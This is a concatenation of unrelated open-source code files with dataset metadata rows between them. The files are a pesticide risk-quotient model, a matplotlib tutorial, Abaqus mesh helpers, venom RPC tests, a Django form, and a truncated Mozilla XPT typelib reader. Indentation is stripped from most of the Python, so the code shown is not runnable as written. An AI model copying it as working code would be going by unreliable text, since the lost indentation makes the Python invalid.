chronic_rq_dose_mamm = self.dose_based_eec_mammals / self.chronic_dose_based_tox_mamm
return chronic_rq_dose_mamm
def acute_rq_diet_mammals(self, diet_based_eec, mammal_lc50):
"""
:description Acute diet-based for risk quotient mammals
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param mammal_lc50; mammalian lc50 (mg/kg-diet)
:param diet_based_eec: diet-based eec for mammal (mg pesticide / kg-bw day)
:return:
"""
acute_rq_diet_mamm = np.array([], dtype = 'float')
acute_rq_diet_mamm = diet_based_eec/ mammal_lc50
return acute_rq_diet_mamm
def chronic_rq_diet_mammals(self, diet_based_eec, mammalian_chronic_endpt, mammalian_chronic_endpt_unit):
"""
:description chronic diet-based rist quotient for mammals
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param mammalian_chronic_endpt: (ppm)
:param diet_based_eec: diet-based eec for mammal (mg pesticide / kg
:return:
"""
chronic_rq_diet_mamm = np.array([], dtype = 'float')
if (mammalian_chronic_endpt_unit == 'ppm'):
chronic_rq_diet_mamm = diet_based_eec / mammalian_chronic_endpt
else:
chronic_rq_diet_mamm = diet_based_eec / (mammalian_chronic_endpt * 20.)
return chronic_rq_diet_mamm
def acute_rq_dose_birds(self):
"""
:description Dose-based risk quotient for birds
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param dose_based_eec_birds: self defined
:param acute_dose_based_tox_birds: self defined
:return:
"""
acute_rq_dose_bird = self.dose_based_eec_birds / self.dose_based_tox_birds
return acute_rq_dose_bird
def acute_rq_diet_birds(self, diet_based_eec, bird_lc50):
"""
:description Acute diet-based for risk quotient birds
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param bird_lc50; avian lc50 (mg/kg-diet)
:param diet_based_eec: diet-based eec for birds (mg pesticide / kg-bw day)
:note in the OPP spreadsheet 'bird_lc50' may be input as 'N/A' or have
a value; in the case it is assigned 'N/A' this method should assign
'acute_rq_diet_bird' a value of 'N/A' -- as implemented below it will
either assign a 'nan' or issue a divide by zero error.
:return:
"""
acute_rq_diet_bird = diet_based_eec/ bird_lc50
return acute_rq_diet_bird
def chronic_rq_diet_birds(self, diet_based_eec, avian_chronic_endpt):
"""
:description chronic diet-based rist quotient for birds
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param avian_chronic_endpt: avian noaec (mg/kg-diet)
:param diet_based_eec: diet-based eec for mammal (mg pesticide / kg
:return:
"""
chronic_rq_diet_bird = np.array([], dtype = 'float')
chronic_rq_diet_bird = diet_based_eec / avian_chronic_endpt
return chronic_rq_diet_bird
|
unlicense
| -2,566,465,609,833,547,000
| 44.97177
| 134
| 0.625641
| false
| 3.258099
| false
| false
| false
|
SunPowered/python-workshop-2015
|
code/session3/matplotlib_package.py
|
1
|
3980
|
# -*- coding: utf-8 -*-
"""
matplotlib_package.py - 3 Data Analysis
The dominant plotting library in Python was constructed to
emulate the standard MATLAB plotting syntax and functionality,
hence the name 'matplotlib'.
There are several ways to interface with matplotlib. One can plot
interactively, which is useful for on the fly visualization. One
can subclass or wrap consistent and repetitive functionality
to customize plots. Plotting options can be defined on the local
operating system, if desired.
It is important to configure the plotting backend for your system,
this is done in Spyder in the iPython settings->Graphics. For this
module, inline plotting is recommended.
Resources:
http://matplotlib.org/examples/pylab_examples/
"""
import os
import numpy as np
np.random.seed(12345)
plot_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, 'plots'))
SAVE_FIGS = False
N_FIG = 1
DEBUG = False
def more():
global SAVE_FIGS, N_FIG, plot_dir, DEBUG
if SAVE_FIGS:
plot_name = os.path.join(plot_dir, "plot{}.png".format(N_FIG))
plt.savefig(plot_name)
N_FIG += 1
plt.show()
if not DEBUG:
print
raw_input("More...")
print
"""
Interactive Plotting
By utilizing the matplotlib module pyplot, one easily has access
to all the standard plotting and customization mechanisms
"""
from matplotlib import pyplot as plt
print
print "Plot 1"
time = np.linspace(0, 6 * np.pi)
data = 2 * np.sin(time) + 3 * np.cos(time)
plt.plot(time, data)
plt.title('A title')
plt.xlabel('Time')
plt.ylabel('Data')
plt.savefig(os.path.join(plot_dir, 'plot_example.png'))
"""
Multiple series can be plotted at once, with the following
argument a flag for linestyle and colour.
Important to note that each plot is made up of a figure,
and axes, and plots. if we keep plotting and changing
options, the same axes on the same figure will be modified
in place.
Plots amend the current figure, use the 'figure' function
to start a new figure. Alternatively, we can use
the 'show' function to force the current figure to be
rendered.
"""
more()
print
print 'Plot 2'
#plt.figure()
sin_data = np.sin(time)
cos_data = np.cos(time)
plt.plot(time, cos_data, '-b', time, sin_data, '*r')
plt.title('Sin/Cos')
plt.xlabel('Time')
plt.ylabel('Data')
plt.legend(['Cosine', 'Sine'])
"""
Some more advanced figures include multiple axes on
one figure. These are called 'subplots', and can be
created and modified as follows.
"""
more()
print
print "Plot 3"
ax = plt.subplot(2, 1, 1) # 2 rows, 1 col, current plot 1
plt.plot(time, sin_data, "--k")
plt.title("Damped/Undamped Oscillator")
plt.ylabel("Sin")
plt.xlabel('Time')
damped_sin = np.sin(time) * np.exp(-time / 5)
plt.subplot(2, 1, 2) # This go to the next subplot axes
plt.plot(time, damped_sin, '-g')
plt.ylabel("Damped Sin")
plt.xlabel("Time")
"""
There are many other types of plots that are available
"""
more()
print
print "Plot 4"
hist_data = np.random.randn(2000)
plt.hist(hist_data, color="g", bins=50)
plt.title("Normally Distributed Data")
more()
"""
With some careful manupulation, some advanced plottypes are
also possible, such as a heatmap
"""
import matplotlib.mlab as mlab # Matlab compatible names
import matplotlib.cm as cm # Colour maps
print
print "Plot 5"
delta = 0.025
x = y = np.arange(-3.0, 3.0, delta)
X, Y = np.meshgrid(x, y)
Z1 = mlab.bivariate_normal(X, Y, 1.0, 1.0, 0.0, 0.0)
Z2 = mlab.bivariate_normal(X, Y, 1.5, 0.5, 1, 1)
Z = Z2 - Z1 # difference of Gaussians
im = plt.imshow(Z, interpolation='bilinear', cmap=cm.RdYlGn,
origin='lower', extent=[-3, 3, -3, 3],
vmax=abs(Z).max(), vmin=-abs(Z).max())
plt.title("Heatmaps!")
plt.xlabel("X (mm)")
plt.ylabel("Y (mm)")
more()
|
gpl-2.0
| 380,881,805,217,125,600
| 23.875
| 87
| 0.660553
| false
| 3.186549
| false
| false
| false
|
mengomarlene/2DImage2Mesh
|
Image2MeshToolbox.py
|
1
|
2763
|
#-----------------------------------------------------
def clearUnwantedNodes(model):
from abaqusConstants import ON
## FOR EACH PART: CLEAR UNWANTED NODES AND DELETE SHELL SECTIONS
for myPart in model.parts.values():
## clean node list (remove nodes not in the zMin plane)
#1/ find zMin...
zCoord = list()
nodeLabels = list()
for node in myPart.nodes:
zCoord.append(node.coordinates[2])
nodeLabels.append(node.label)
minZ = min(zCoord)
#2/ build a list of nodes not in zMin
remNodes = [nodeLabels[i] for i, x in enumerate(zCoord) if x > minZ+1e-10]
#3/ remove those nodes (they have to be part of a set to do so, thus first create set - then delete nodes from set - then delete set)
if len(remNodes):
nodesSetToBeRem = myPart.SetFromNodeLabels(nodeLabels=remNodes, name='remNodeSet')
myPart.deleteNode(nodes=nodesSetToBeRem, deleteUnreferencedNodes=ON)
del nodesSetToBeRem
del nodeLabels#that list is not needed any more!
## delete shell section assignments
for sa in myPart.sectionAssignments: del sa
#-----------------------------------------------------
def createSketch(model,set):
mySketch = model.ConstrainedSketch(name='mySketch', sheetSize=30.0)
# loop over elements of the set and their edges
for ele in set.elements:
for edge in ele.getElemEdges():
# if one edge belongs to only one element it means it is an edge or a contact edge, those are the target to build the geometry
if len(edge.getElements())==1:
# reads nodes coordinates of target elements
node = edge.getNodes()
pt1 = (node[0].coordinates[0],node[0].coordinates[1])
pt2 = (node[1].coordinates[0],node[1].coordinates[1])
# create geometrical line between those nodes
mySketch.Line(point1=pt1,point2=pt2)
return mySketch
#-----------------------------------------------------
def addPartsToAssembly(model):
from abaqusConstants import ON
## add new parts to assembly - only after the initial instance has been deleted has they are not of the same type
for part in model.parts.values():
myInstaneName = part.name.split('_')[0]+'_instance'
model.rootAssembly.Instance(myInstaneName, part, dependent=ON)
#-----------------------------------------------------
def deleteOldFeatures(model):
# delete old part,instance,sections,...
del model.rootAssembly.features['PART-1-1']
del model.parts['PART-1']
for sName in model.sections.keys():
del model.sections[sName]
#-----------------------------------------------------
|
gpl-2.0
| -4,718,912,397,360,695,000
| 49.254545
| 141
| 0.588853
| false
| 4.111607
| false
| false
| false
|
biosustain/venom
|
tests/rpc/test_method.py
|
1
|
3948
|
from collections import namedtuple
from unittest import SkipTest
from venom import Empty
from venom import Message
from venom.common import Value, BoolValue
from venom.common.types import JSONValue
from venom.converter import Converter
from venom.fields import Int32, String
from venom.rpc import Service, rpc
from venom.rpc.method import HTTPVerb, MethodDescriptor
from venom.rpc.stub import Stub
from venom.rpc.test_utils import AioTestCase
class MethodTestCase(AioTestCase):
async def test_method_override(self):
Snake = namedtuple('Snake', ('name', 'size'))
class SnakeMessage(Message):
name = String()
size = Int32()
class SnakeConverter(Converter):
wire = SnakeMessage
python = Snake
def resolve(self, message: SnakeMessage) -> Snake:
return Snake(message.name, message.size)
def format(self, value: Snake) -> SnakeMessage:
return SnakeMessage(name=value.name, size=value.size)
class SnakeStub(Stub):
@rpc(SnakeMessage, SnakeMessage)
def grow(self): pass
self.assertEqual(set(SnakeStub.__methods__.keys()), {"grow"})
self.assertEqual(SnakeStub.__methods__['grow'].request, SnakeMessage)
self.assertEqual(SnakeStub.__methods__['grow'].response, SnakeMessage)
# TODO test without stub (auto-generated request message)
class SnakeService(Service):
class Meta:
converters = [SnakeConverter()]
stub = SnakeStub
@rpc
def grow(self, request: Snake) -> Snake:
return Snake(name=request.name, size=request.size + 1)
self.assertEqual(await SnakeService().grow(SnakeMessage('snek', 2)), SnakeMessage('snek', 3))
self.assertEqual(await SnakeService.grow.invoke(SnakeService(), SnakeMessage(name='snek', size=2)),
SnakeMessage(name='snek', size=3))
self.assertEqual(await SnakeService.grow.invoke(SnakeService(), SnakeMessage(name='snek')),
SnakeMessage(name='snek', size=1))
def test_method_http(self):
class FooService(Service):
pass
self.assertEqual(MethodDescriptor(Empty, Empty).prepare(FooService(), 'bar').http_path, '/foo/bar')
self.assertEqual(MethodDescriptor(Empty, Empty).prepare(FooService(), 'foo').http_method, HTTPVerb.POST)
self.assertEqual(MethodDescriptor(Empty, Empty,
http_path='./bar').prepare(FooService(), 'foo').http_path, '/foo/bar')
self.assertEqual(MethodDescriptor(Empty, Empty, http_method=HTTPVerb.POST).http_method, HTTPVerb.POST)
self.assertEqual(MethodDescriptor(Empty, Empty, http_method=HTTPVerb.DELETE).http_method, HTTPVerb.DELETE)
def test_method_http_rule_params(self):
class Snake(Message):
id = Int32()
name = String()
size = Int32()
class FooService(Service):
pass
self.assertEqual(MethodDescriptor(Empty, Empty)
.prepare(FooService(), 'foo')
.http_path_parameters(), set())
self.assertEqual(MethodDescriptor(Snake, Snake, http_path='./{id}')
.prepare(FooService(), 'foo')
.http_path_parameters(), {'id'})
self.assertEqual(MethodDescriptor(Snake, Snake, http_path='./{name}/{id}')
.prepare(FooService(), 'foo')
.http_path_parameters(), {'id', 'name'})
@SkipTest
async def test_json_method(self):
class FooService(Service):
@rpc
def get_json(self) -> JSONValue:
return {"foo": True}
self.assertEqual(await FooService.get_json.invoke(FooService(), Empty()),
Value(bool_value=BoolValue(True)))
|
mit
| 881,615,685,516,078,600
| 38.878788
| 114
| 0.607903
| false
| 3.967839
| true
| false
| false
|
wampixel/sciMS
|
index/forms.py
|
1
|
1025
|
from django import forms
class registration(forms.Form):
username = forms.CharField(max_length=100,
widget=forms.TextInput(attrs={'class': 'form-control',
'placeholder' : 'Username'}))
nom = forms.CharField(max_length=100,
widget=forms.TextInput(attrs={'class': 'form-control',
'placeholder' : 'Nom'}))
prenom = forms.CharField(max_length=100,
widget=forms.TextInput(attrs={'class': 'form-control',
'placeholder' : 'Prenom'}))
passwd = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'form-control',
'placeholder' : 'password'}))
email = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control',
'placeholder' : 'xyz@example.fr'}))
|
gpl-3.0
| 5,774,265,578,307,167,000
| 63.125
| 96
| 0.470244
| false
| 5.203046
| false
| false
| false
|
Yukarumya/Yukarum-Redfoxes
|
xpcom/typelib/xpt/tools/xpt.py
|
1
|
56333
|
#!/usr/bin/env python
# Copyright 2010,2011 Mozilla Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE MOZILLA FOUNDATION ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE MOZILLA FOUNDATION OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the Mozilla
# Foundation.
"""
A module for working with XPCOM Type Libraries.
The XPCOM Type Library File Format is described at:
http://www.mozilla.org/scriptable/typelib_file.html . It is used
to provide type information for calling methods on XPCOM objects
from scripting languages such as JavaScript.
This module provides a set of classes representing the parts of
a typelib in a high-level manner, as well as methods for reading
and writing them from files.
The usable public interfaces are currently:
Typelib.read(input_file) - read a typelib from a file on disk or file-like
object, return a Typelib object.
xpt_dump(filename) - read a typelib from a file on disk, dump
the contents to stdout in a human-readable
format.
Typelib() - construct a new Typelib object
Interface() - construct a new Interface object
Method() - construct a new object representing a method
defined on an Interface
Constant() - construct a new object representing a constant
defined on an Interface
Param() - construct a new object representing a parameter
to a method
SimpleType() - construct a new object representing a simple
data type
InterfaceType() - construct a new object representing a type that
is an IDL-defined interface
"""
from __future__ import with_statement
import os
import sys
import struct
import operator
# header magic
XPT_MAGIC = "XPCOM\nTypeLib\r\n\x1a"
TYPELIB_VERSION = (1, 2)
class FileFormatError(Exception):
pass
class DataError(Exception):
pass
# Magic for creating enums
def M_add_class_attribs(attribs):
def foo(name, bases, dict_):
for v, k in attribs:
dict_[k] = v
return type(name, bases, dict_)
return foo
def enum(*names):
class Foo(object):
__metaclass__ = M_add_class_attribs(enumerate(names))
def __setattr__(self, name, value): # this makes it read-only
raise NotImplementedError
return Foo()
# Descriptor types as described in the spec
class Type(object):
"""
Data type of a method parameter or return value. Do not instantiate
this class directly. Rather, use one of its subclasses.
"""
_prefixdescriptor = struct.Struct(">B")
Tags = enum(
# The first 18 entries are SimpleTypeDescriptor
'int8',
'int16',
'int32',
'int64',
'uint8',
'uint16',
'uint32',
'uint64',
'float',
'double',
'boolean',
'char',
'wchar_t',
'void',
# the following four values are only valid as pointers
'nsIID',
'DOMString',
'char_ptr',
'wchar_t_ptr',
# InterfaceTypeDescriptor
'Interface',
# InterfaceIsTypeDescriptor
'InterfaceIs',
# ArrayTypeDescriptor
'Array',
# StringWithSizeTypeDescriptor
'StringWithSize',
# WideStringWithSizeTypeDescriptor
'WideStringWithSize',
# XXX: These are also SimpleTypes (but not in the spec)
# http://hg.mozilla.org/mozilla-central/annotate/0e0e2516f04e/xpcom/typelib/xpt/tools/xpt_dump.c#l69
'UTF8String',
'CString',
'AString',
'jsval',
)
def __init__(self, pointer=False, reference=False):
self.pointer = pointer
self.reference = reference
if reference and not pointer:
raise Exception("If reference is True pointer must be True too")
def __cmp__(self, other):
return (
# First make sure we have two Types of the same type (no pun intended!)
cmp(type(self), type(other)) or
cmp(self.pointer, other.pointer) or
cmp(self.reference, other.reference)
)
@staticmethod
def decodeflags(byte):
"""
Given |byte|, an unsigned uint8 containing flag bits,
decode the flag bits as described in
http://www.mozilla.org/scriptable/typelib_file.html#TypeDescriptor
and return a dict of flagname: (True|False) suitable
for passing to Type.__init__ as **kwargs.
"""
return {'pointer': bool(byte & 0x80),
'reference': bool(byte & 0x20),
}
def encodeflags(self):
"""
Encode the flag bits of this Type object. Returns a byte.
"""
flags = 0
if self.pointer:
flags |= 0x80
if self.reference:
flags |= 0x20
return flags
@staticmethod
def read(typelib, map, data_pool, offset):
"""
Read a TypeDescriptor at |offset| from the mmaped file |map| with
data pool offset |data_pool|. Returns (Type, next offset),
where |next offset| is an offset suitable for reading the data
following this TypeDescriptor.
"""
start = data_pool + offset - 1
(data,) = Type._prefixdescriptor.unpack_from(map, start)
# first three bits are the flags
flags = data & 0xE0
flags = Type.decodeflags(flags)
# last five bits is the tag
tag = data & 0x1F
offset += Type._prefixdescriptor.size
t = None
if tag <= Type.Tags.wchar_t_ptr or tag >= Type.Tags.UTF8String:
t = SimpleType.get(data, tag, flags)
elif tag == Type.Tags.Interface:
t, offset = InterfaceType.read(typelib, map, data_pool, offset, flags)
elif tag == Type.Tags.InterfaceIs:
t, offset = InterfaceIsType.read(typelib, map, data_pool, offset, flags)
elif tag == Type.Tags.Array:
t, offset = ArrayType.read(typelib, map, data_pool, offset, flags)
elif tag == Type.Tags.StringWithSize:
t, offset = StringWithSizeType.read(typelib, map, data_pool, offset, flags)
elif tag == Type.Tags.WideStringWithSize:
t, offset = WideStringWithSizeType.read(typelib, map, data_pool, offset, flags)
return t, offset
def write(self, typelib, file):
"""
Write a TypeDescriptor to |file|, which is assumed
to be seeked to the proper position. For types other than
SimpleType, this is not sufficient for writing the TypeDescriptor,
and the subclass method must be called.
"""
file.write(Type._prefixdescriptor.pack(self.encodeflags() | self.tag))
class SimpleType(Type):
"""
A simple data type. (SimpleTypeDescriptor from the typelib specification.)
"""
_cache = {}
def __init__(self, tag, **kwargs):
Type.__init__(self, **kwargs)
self.tag = tag
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.tag, other.tag)
)
@staticmethod
def get(data, tag, flags):
"""
Get a SimpleType object representing |data| (a TypeDescriptorPrefix).
May return an already-created object. If no cached object is found,
construct one with |tag| and |flags|.
"""
if data not in SimpleType._cache:
SimpleType._cache[data] = SimpleType(tag, **flags)
return SimpleType._cache[data]
def __str__(self):
s = "unknown"
if self.tag == Type.Tags.char_ptr and self.pointer:
return "string"
if self.tag == Type.Tags.wchar_t_ptr and self.pointer:
return "wstring"
for t in dir(Type.Tags):
if self.tag == getattr(Type.Tags, t):
s = t
break
if self.pointer:
if self.reference:
s += " &"
else:
s += " *"
return s
class InterfaceType(Type):
"""
A type representing a pointer to an IDL-defined interface.
(InterfaceTypeDescriptor from the typelib specification.)
"""
_descriptor = struct.Struct(">H")
def __init__(self, iface, pointer=True, **kwargs):
if not pointer:
raise DataError("InterfaceType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.iface = iface
self.tag = Type.Tags.Interface
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
# When comparing interface types, only look at the name.
cmp(self.iface.name, other.iface.name) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an InterfaceTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (InterfaceType, next offset),
where |next offset| is an offset suitable for reading the data
following this InterfaceTypeDescriptor.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(iface_index,) = InterfaceType._descriptor.unpack_from(map, start)
offset += InterfaceType._descriptor.size
iface = None
# interface indices are 1-based
if iface_index > 0 and iface_index <= len(typelib.interfaces):
iface = typelib.interfaces[iface_index - 1]
return InterfaceType(iface, **flags), offset
def write(self, typelib, file):
"""
Write an InterfaceTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
# write out the interface index (1-based)
file.write(InterfaceType._descriptor.pack(typelib.interfaces.index(self.iface) + 1))
def __str__(self):
if self.iface:
return self.iface.name
return "unknown interface"
class InterfaceIsType(Type):
"""
A type representing an interface described by one of the other
arguments to the method. (InterfaceIsTypeDescriptor from the
typelib specification.)
"""
_descriptor = struct.Struct(">B")
_cache = {}
def __init__(self, param_index, pointer=True, **kwargs):
if not pointer:
raise DataError("InterfaceIsType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.param_index = param_index
self.tag = Type.Tags.InterfaceIs
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.param_index, other.param_index) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an InterfaceIsTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (InterfaceIsType, next offset),
where |next offset| is an offset suitable for reading the data
following this InterfaceIsTypeDescriptor.
May return a cached value.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(param_index,) = InterfaceIsType._descriptor.unpack_from(map, start)
offset += InterfaceIsType._descriptor.size
if param_index not in InterfaceIsType._cache:
InterfaceIsType._cache[param_index] = InterfaceIsType(param_index, **flags)
return InterfaceIsType._cache[param_index], offset
def write(self, typelib, file):
"""
Write an InterfaceIsTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
file.write(InterfaceIsType._descriptor.pack(self.param_index))
def __str__(self):
return "InterfaceIs *"
class ArrayType(Type):
"""
A type representing an Array of elements of another type, whose
size and length are passed as separate parameters to a method.
(ArrayTypeDescriptor from the typelib specification.)
"""
_descriptor = struct.Struct(">BB")
def __init__(self, element_type, size_is_arg_num, length_is_arg_num,
pointer=True, **kwargs):
if not pointer:
raise DataError("ArrayType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.element_type = element_type
self.size_is_arg_num = size_is_arg_num
self.length_is_arg_num = length_is_arg_num
self.tag = Type.Tags.Array
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.element_type, other.element_type) or
cmp(self.size_is_arg_num, other.size_is_arg_num) or
cmp(self.length_is_arg_num, other.length_is_arg_num) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an ArrayTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (ArrayType, next offset),
where |next offset| is an offset suitable for reading the data
following this ArrayTypeDescriptor.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(size_is_arg_num, length_is_arg_num) = ArrayType._descriptor.unpack_from(map, start)
offset += ArrayType._descriptor.size
t, offset = Type.read(typelib, map, data_pool, offset)
return ArrayType(t, size_is_arg_num, length_is_arg_num, **flags), offset
def write(self, typelib, file):
"""
Write an ArrayTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
file.write(ArrayType._descriptor.pack(self.size_is_arg_num,
self.length_is_arg_num))
self.element_type.write(typelib, file)
def __str__(self):
return "%s []" % str(self.element_type)
class StringWithSizeType(Type):
"""
A type representing a UTF-8 encoded string whose size and length
are passed as separate arguments to a method. (StringWithSizeTypeDescriptor
from the typelib specification.)
"""
_descriptor = struct.Struct(">BB")
def __init__(self, size_is_arg_num, length_is_arg_num,
pointer=True, **kwargs):
if not pointer:
raise DataError("StringWithSizeType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.size_is_arg_num = size_is_arg_num
self.length_is_arg_num = length_is_arg_num
self.tag = Type.Tags.StringWithSize
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.size_is_arg_num, other.size_is_arg_num) or
cmp(self.length_is_arg_num, other.length_is_arg_num) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an StringWithSizeTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (StringWithSizeType, next offset),
where |next offset| is an offset suitable for reading the data
following this StringWithSizeTypeDescriptor.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(size_is_arg_num, length_is_arg_num) = StringWithSizeType._descriptor.unpack_from(map, start)
offset += StringWithSizeType._descriptor.size
return StringWithSizeType(size_is_arg_num, length_is_arg_num, **flags), offset
def write(self, typelib, file):
"""
Write a StringWithSizeTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
file.write(StringWithSizeType._descriptor.pack(self.size_is_arg_num,
self.length_is_arg_num))
def __str__(self):
return "string_s"
class WideStringWithSizeType(Type):
"""
A type representing a UTF-16 encoded string whose size and length
are passed as separate arguments to a method.
(WideStringWithSizeTypeDescriptor from the typelib specification.)
"""
_descriptor = struct.Struct(">BB")
def __init__(self, size_is_arg_num, length_is_arg_num,
pointer=True, **kwargs):
if not pointer:
raise DataError("WideStringWithSizeType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.size_is_arg_num = size_is_arg_num
self.length_is_arg_num = length_is_arg_num
self.tag = Type.Tags.WideStringWithSize
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.size_is_arg_num, other.size_is_arg_num) or
cmp(self.length_is_arg_num, other.length_is_arg_num) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an WideStringWithSizeTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (WideStringWithSizeType, next offset),
where |next offset| is an offset suitable for reading the data
following this WideStringWithSizeTypeDescriptor.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(size_is_arg_num, length_is_arg_num) = WideStringWithSizeType._descriptor.unpack_from(map, start)
offset += WideStringWithSizeType._descriptor.size
return WideStringWithSizeType(size_is_arg_num, length_is_arg_num, **flags), offset
def write(self, typelib, file):
"""
Write a WideStringWithSizeTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
file.write(WideStringWithSizeType._descriptor.pack(self.size_is_arg_num,
self.length_is_arg_num))
def __str__(self):
return "wstring_s"
class Param(object):
"""
A parameter to a method, or the return value of a method.
(ParamDescriptor from the typelib specification.)
"""
_descriptorstart = struct.Struct(">B")
def __init__(self, type, in_=True, out=False, retval=False,
shared=False, dipper=False, optional=False):
"""
Construct a Param object with the specified |type| and
flags. Params default to "in".
"""
self.type = type
self.in_ = in_
self.out = out
self.retval = retval
self.shared = shared
self.dipper = dipper
self.optional = optional
def __cmp__(self, other):
return (
cmp(self.type, other.type) or
cmp(self.in_, other.in_) or
cmp(self.out, other.out) or
cmp(self.retval, other.retval) or
cmp(self.shared, other.shared) or
cmp(self.dipper, other.dipper) or
cmp(self.optional, other.optional)
)
@staticmethod
def decodeflags(byte):
"""
Given |byte|, an unsigned uint8 containing flag bits,
decode the flag bits as described in
http://www.mozilla.org/scriptable/typelib_file.html#ParamDescriptor
and return a dict of flagname: (True|False) suitable
for passing to Param.__init__ as **kwargs
"""
return {'in_': bool(byte & 0x80),
'out': bool(byte & 0x40),
'retval': bool(byte & 0x20),
'shared': bool(byte & 0x10),
'dipper': bool(byte & 0x08),
# XXX: Not in the spec, see:
# http://hg.mozilla.org/mozilla-central/annotate/0e0e2516f04e/xpcom/typelib/xpt/public/xpt_struct.h#l456
'optional': bool(byte & 0x04),
}
def encodeflags(self):
"""
Encode the flags of this Param. Return a byte suitable for
writing to a typelib file.
"""
flags = 0
if self.in_:
flags |= 0x80
if self.out:
flags |= 0x40
if self.retval:
flags |= 0x20
if self.shared:
flags |= 0x10
if self.dipper:
flags |= 0x08
if self.optional:
flags |= 0x04
return flags
@staticmethod
def read(typelib, map, data_pool, offset):
"""
Read a ParamDescriptor at |offset| from the mmaped file |map| with
data pool offset |data_pool|. Returns (Param, next offset),
where |next offset| is an offset suitable for reading the data
following this ParamDescriptor.
"""
start = data_pool + offset - 1
(flags,) = Param._descriptorstart.unpack_from(map, start)
# only the first five bits are flags
flags &= 0xFC
flags = Param.decodeflags(flags)
offset += Param._descriptorstart.size
t, offset = Type.read(typelib, map, data_pool, offset)
p = Param(t, **flags)
return p, offset
def write(self, typelib, file):
"""
Write a ParamDescriptor to |file|, which is assumed to be seeked
to the correct position.
"""
file.write(Param._descriptorstart.pack(self.encodeflags()))
self.type.write(typelib, file)
def prefix(self):
"""
Return a human-readable string representing the flags set
on this Param.
"""
s = ""
if self.out:
if self.in_:
s = "inout "
else:
s = "out "
else:
s = "in "
if self.dipper:
s += "dipper "
if self.retval:
s += "retval "
if self.shared:
s += "shared "
if self.optional:
s += "optional "
return s
def __str__(self):
return self.prefix() + str(self.type)
class Method(object):
"""
A method of an interface, defining its associated parameters
and return value.
(MethodDescriptor from the typelib specification.)
"""
_descriptorstart = struct.Struct(">BIB")
def __init__(self, name, result,
params=[], getter=False, setter=False, notxpcom=False,
constructor=False, hidden=False, optargc=False,
implicit_jscontext=False):
self.name = name
self._name_offset = 0
self.getter = getter
self.setter = setter
self.notxpcom = notxpcom
self.constructor = constructor
self.hidden = hidden
self.optargc = optargc
self.implicit_jscontext = implicit_jscontext
self.params = list(params)
if result and not isinstance(result, Param):
